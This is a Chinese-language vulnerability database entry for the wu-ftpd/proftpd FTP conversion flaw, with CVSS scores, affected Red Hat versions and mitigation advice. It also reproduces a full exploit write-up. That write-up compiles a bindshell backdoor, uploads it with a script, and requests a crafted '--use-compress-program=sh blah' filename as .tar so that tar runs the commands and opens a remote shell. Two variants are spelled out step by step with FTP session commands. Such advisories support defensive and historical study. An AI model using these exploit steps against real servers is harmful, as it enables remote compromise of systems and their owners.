发布时间 :1999-12-20 00:00:00
修订时间 :2008-09-05 16:18:28

[原文]wu-ftp with FTP conversion enabled allows an attacker to execute commands via a malformed file name that is interpreted as an argument to the program that does the conversion, e.g. tar or uncompress.


        FTP客户端请求获取一个文件名,其后跟随.tar/.tar.gz/.Z/.gz的时候,某些FTP Server会自动执行/bin/tar之类的程序去打包、压缩并下载给FTP客户端,这是通过管道实现的。而tar这样的命令有能力执行任意命令,入侵者通过请求一个特殊的文件名而使FTP Server启动远程shell。现在已知在某些平台(如Linux)下的wu-ftpd 2.6.0及以下版本FTP服务器和proftpd FTP服务器受此漏洞影响,利用这个漏洞需要攻击者有上传文件的权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/o:redhat:linux:5.2Red Hat Linux 5.2

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

高危 未知
1999-12-20 00:00:00 2005-09-12 00:00:00
        FTP客户端请求获取一个文件名,其后跟随.tar/.tar.gz/.Z/.gz的时候,某些FTP Server会自动执行/bin/tar之类的程序去打包、压缩并下载给FTP客户端,这是通过管道实现的。而tar这样的命令有能力执行任意命令,入侵者通过请求一个特殊的文件名而使FTP Server启动远程shell。现在已知在某些平台(如Linux)下的wu-ftpd 2.6.0及以下版本FTP服务器和proftpd FTP服务器受此漏洞影响,利用这个漏洞需要攻击者有上传文件的权限。

- 公告与补丁

        * 这种入侵技术要求可以上载文件,正确配置FTP Server,禁止用户上载文件。
        * 配置FTP服务器,取消用户在服务器端执行压缩和解压的能力。
        Washington University

- 漏洞信息 (20563)

wu-ftpd 2.4.2/2.5 .0/2.6 .0/2.6.1/2.6.2 FTP Conversion Vulnerability (EDBID:20563)
unix remote
1999-12-20 Verified
0 suid
N/A [点击下载]

Some FTP servers provide a "conversion" service that pipes a requested file through a program, for example a decompression utility such as "tar", before it is passed to the remote user. Under some configurations where this is enabled a remote user can pass a filename beginning with a minus sign to FTP, which will pass this as an argument to the compression/archiver program (where it will be erroneously treated as a command line argument other than a filename). It may be possible to exploit this and execute commands on a remote machine. An example of this exploits the "--use-compress-program PROG" parameter passed to tar; if PROG refers to a program that is accessible to the FTP server, it will be executed. The remote user must have access to a writeable directory in order to exploit this. See exploit for details. 

With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.

The exploit goes along much the same lines as the anonymous FTP exploit does:

Create a backdoor, using bindshell from our previous example:

$ gcc bindshell.c -o b -static

If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:

$ cat > blah
./b &

Now create empty file "--use-compress-program=bash blah"

$ > "--use-compress-program=bash blah"

FTP to your target, login with your username/password. Upload your 3 files:

ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"

Do a SITE CHMOD for b and blah:

ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah

Now get your file:

ftp> get "--use-compress-program=bash blah".tar

Thats all there is to it. You now should have a shell on whatever port you specified.


An alternative exploit that bypasses the need to use SITE CHMOD has been suggested by (this can be accomplished over anonymous FTP):

"This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).

For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.

First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.

$ gcc bindshell.c -o b -static

Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage.
(SITE CHMOD rarely works on anonymous ftp sites)

$ tar -cf b.tar b

Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.

$ cat > blah
/bin/tar -xf b.tar

Leave the first line as a comment.

Create a empty file called "--use-compress-program=sh blah"

$ > "--use-compress-program=sh blah"

Connect to your target ftp server.

$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

Change to your world writeable directory:

ftp> cd /incoming

Store your files:

ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"

Now using TAR conversion, get your "--use-compress-program=sh blah" file.

ftp> get "--use-compress-program=sh blah".tar

It should open a connection then freeze. Now telnet to your bindshell port." 		

- 漏洞信息

WU-FTPD FTP Conversion Service Malformed File Name Handling Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-12-19 Unknow
1999-12-19 Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete